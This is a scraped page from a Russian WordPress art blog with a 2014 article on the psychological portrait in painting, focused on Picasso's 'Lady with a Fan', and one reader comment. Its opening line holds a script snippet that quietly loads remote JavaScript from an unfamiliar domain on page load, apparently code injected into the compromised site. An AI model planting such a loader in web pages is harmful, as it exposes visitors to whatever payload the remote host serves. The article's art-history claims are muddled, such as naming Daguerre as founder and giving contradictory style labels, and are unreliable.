, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Психологический портрет

Автор: Дмитрий Алмазов | 22 Мар 2014

Психологический портретПсихологический портрет - это безумно увлекательный вид  фото искусства и изобразительного искусства. Мы с вами поговорим об изобразительном творчестве. В любом направлении  живописи присутствует психологический портрет.  Так давайте же  познакомимся с особенностями этого вида.

Во-первых, начнем с определения. Психологический портрет — это разновидность портретного жанра в изобразительном искусстве. Подобный портрет призван показать глубину внутреннего мира и переживаний человека, отразить его личность, запечатлеть многообразие человеческих чувств и действий. Термин "психологический портрет" появился в 19 веке, во Франции. Основоположником данного жанра является Луи Дагер, который начал создавать  психологические фотопортреты собственных друзей, а потом и  известных людей. Впоследствии такой вид перекочевал в живопись и стал популярным у импрессионистов и модернистов.

Психологический портет, Дама с вееромВо-вторых, ярким примером психологического портрета является творчество Пабло Пикассо, особенно его кубический и «голубой»  периоды. В своем творчестве знаменитый испанец эклектирует сложную технику, с помощью которого мэтр добивается особого изображения "души человека".  В "голубом периоде" присутствует множество психологических портретов: "Автопортрет", "Портрет Женщины", " Портрет любительницы абсента". На мой взгляд, вышеперечисленные полотна становится жемчужиной творчества Пикассо, но самой главной жемчужиной и эталоном является "Дама с веером".

"Дама с веером" - это отчасти сюрреалистическое, отчасти супрематистское,  отчасти кубическое. Все эти три направление помогают почувствовать психологии художника. Для справки: картина является  примером классического кубизма, но многие исследователи не соглашаются с этой точкой зрения.

Существует легенда, которую охотно поддерживают искусствоведы: на полотне изображена Муза Пабло Пикассо. Она предстает перед нами с убеленным лицом, в черном  платье и  с монохромном веером. Благодаря лейтмотивному набору тонов, картина обладает мистическим шармом. Темно-синие, черные, изумрудные тона заставляют почувствовать грусть и безнадежность Музы. Ведь картина была написана в 1909 году, Психологический портрет. Голова женщиныкогда художник вместе со своей любовью жил на абсолютные  копейки. Они как-то перебивались хлебом и скитались по углам. Поэтому в глазах Музы можно угадать все эти проблемы. Но только  глаза, как зеркало, выдают все правду. Зато образ "глаголет" обратное: перед нами шикарная, обеспеченная дама, одетая по последней моде. И все бы хорошо, если не эти глаза, которые создают психологический портрет.

Итак, психологический портрет - это особый вид искусства, который помогает любому творцы кисти стать настоящим мэтром. Ведь, освоив технику передачи психологии человека с помощью красок и линий, художник достигнет апогея собственного творчества и становится гением.

Но и не будем забывать, что стать гением дано не каждому…

Заказать копии картин Вы можете у художников Лаборатории Искусства по телефону или написав в разделе контакты.

Темы: Изобразительное искусство, Портрет | 1 отзыв »

Один отзыв на “Психологический портрет”

  1. Лики пишет:
    27 Мар 2014 в 21:10

    Психологический портрет – необычный вид искусства, который, как понятно из статьи, недавно зародился в живописи.
    Из статьи узнала новую информацию о Пабло Пикассо, о том, как он создавал свою знаменитую картину «Дама с веером». Единственный минус этой работы, это отсутствие других примеров.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress